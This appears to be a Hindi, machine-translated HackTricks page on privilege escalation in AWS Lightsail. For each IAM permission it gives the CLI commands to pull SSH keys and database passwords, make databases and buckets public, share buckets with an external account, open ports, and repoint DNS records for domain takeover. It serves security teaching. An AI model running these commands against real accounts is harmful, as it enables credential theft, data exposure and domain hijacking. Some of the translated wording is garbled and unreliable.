AWS - Lightsail Privesc

एडवांस्ड वेब सर्विसेज हैकिंग सीखें और प्रैक्टिस करें:HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE) जीसीपी हैकिंग सीखें और प्रैक्टिस करें: HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)

हैकट्रिक्स का समर्थन करें

सब्सक्रिप्शन योजनाएं की जाँच करें!
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह और ट्विटर 🐦 @hacktricks_live** को** फॉलो करें।
हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github रेपो में।

Lightsail

Lightsail के बारे में अधिक जानकारी के लिए देखें:

AWS - Lightsail Enum

यह महत्वपूर्ण है कि लाइटसेल उपयोगकर्ता के नाम से नहीं IAM भूमिकाएँ उपयोग करता है, बल्कि एक AWS प्रबंधित खाते के लिए, इसलिए आप इस सेवा का दुरुपयोग नहीं कर सकते। हालांकि, इस सेवा में संवेदनशील डेटा जैसे कोड, API कुंजी और डेटाबेस जानकारी मिल सकती है।

`lightsail:DownloadDefaultKeyPair`

यह अनुमति आपको इंस्टेंस तक पहुंचने के लिए SSH कुंजी प्राप्त करने की अनुमति देगी:

aws lightsail download-default-key-pair

संभावित प्रभाव: इंस्टेंसेस के अंदर संवेदनशील जानकारी खोजें।

`lightsail:GetInstanceAccessDetails`

यह अनुमति आपको इंस्टेंसेस तक पहुंचने के लिए SSH कुंजी उत्पन्न करने की अनुमति देगी:

aws lightsail get-instance-access-details --instance-name <instance_name>

संभावित प्रभाव: इंस्टेंसेस के अंदर संवेदनशील जानकारी खोजें।

`lightsail:CreateBucketAccessKey`

यह अनुमति आपको बकेट तक पहुंचने की कुंजी प्राप्त करने की अनुमति देगी:

aws lightsail create-bucket-access-key --bucket-name <name>

संभावित प्रभाव: बाल्टी में गोपनीय जानकारी खोजें।

`lightsail:GetRelationalDatabaseMasterUserPassword`

यह अनुमति आपको डेटाबेस तक पहुंचने के लिए प्रमाणों को प्राप्त करने की अनुमति देगी:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

संभावित प्रभाव: डेटाबेस के अंदर संवेदनशील जानकारी खोजें।

`lightsail:UpdateRelationalDatabase`

यह अनुमति आपको डेटाबेस तक पहुंचने के लिए पासवर्ड बदलने की अनुमति देगी:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

यदि डेटाबेस सार्वजनिक नहीं है, तो आप इस अनुमतियों के साथ इसे सार्वजनिक भी बना सकते हैं।

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

संभावित प्रभाव: डेटाबेस में संवेदनशील जानकारी खोजें।

`lightsail:OpenInstancePublicPorts`

यह अनुमति इंटरनेट पर पोर्ट खोलने की अनुमति देती है।

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

संभावित प्रभाव: संवेदनशील पोर्ट तक पहुंच।

`lightsail:PutInstancePublicPorts`

यह अनुमति इंटरनेट पर पोर्ट खोलने की अनुमति देती है। ध्यान दें कि यह कॉल उस पर किसी भी पोर्ट को बंद कर देगा जो इस पर निर्दिष्ट नहीं है।

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

संभावित प्रभाव: संवेदनशील पोर्ट तक पहुंच।

`lightsail:SetResourceAccessForBucket`

यह अनुमतियाँ इंस्टेंस को किसी बकेट तक पहुंच देने की अनुमति देती है बिना किसी अतिरिक्त प्रमाण-पत्र के।

aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow

संभावित प्रभाव: संवेदनशील जानकारी वाले बकेट्स तक का संभावित नया पहुंच।

`lightsail:UpdateBucket`

इस अनुमति के साथ एक हमलावर अपने AWS खाते पर बकेट्स पर पढ़ने की पहुंच प्रदान कर सकता है या यहाँ तक कि बकेट्स को सभी के लिए सार्वजनिक बना सकता है:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

संभावित प्रभाव: संभावित नए बकेट्स तक पहुंच संवेदनशील जानकारी के साथ।

`lightsail:UpdateContainerService`

इस अनुमति के साथ एक हमलावर निजी ECRs तक पहुंच प्रदान कर सकता है।

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

संभावित प्रभाव: निजी ECR से संवेदनशील जानकारी प्राप्त करें

`lightsail:CreateDomainEntry`

इस अनुमति के साथ एक हमलावर उपनाम बना सकता है और इसे अपने खुद के आईपी पते पर पॉइंट कर सकता है (उपनाम ले ओवर), या एक SPF रिकॉर्ड बना सकता है जो उसे डोमेन से ईमेल भेजने की अनुमति देता है, या यहाँ तक कि मुख्य डोमेन को अपने खुद के आईपी पते पर सेट कर सकता है।

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

संभावित प्रभाव: डोमेन का अधिकार

`lightsail:UpdateDomainEntry`

इस अनुमति के साथ एक हमलावर उपन्यास उपन्यास बना सकता है और इसे अपने खुद के आईपी पते पर पॉइंट कर सकता है (सबडोमेन ताकना), या एक SPF रिकॉर्ड को तैयार कर सकता है जो उसे डोमेन से ईमेल भेजने की अनुमति देता है, या यहां तक कि मुख्य डोमेन को अपने खुद के आईपी पते पर सेट कर सकता है।

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

संभावित प्रभाव: डोमेन का अधिग्रहण

AWS हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)

हैकट्रिक्स का समर्थन करें

सदस्यता योजनाएं की जाँच करें!
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह और ट्विटर 🐦 @hacktricks_live** पर हमें फॉलो करें।
हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स](https://github.com/carlospolop/hacktricks) और HackTricks Cloud github रेपो में PR जमा करके।

PreviousAWS - Lambda Privesc NextAWS - Mediapackage Privesc

Last updated 1 month ago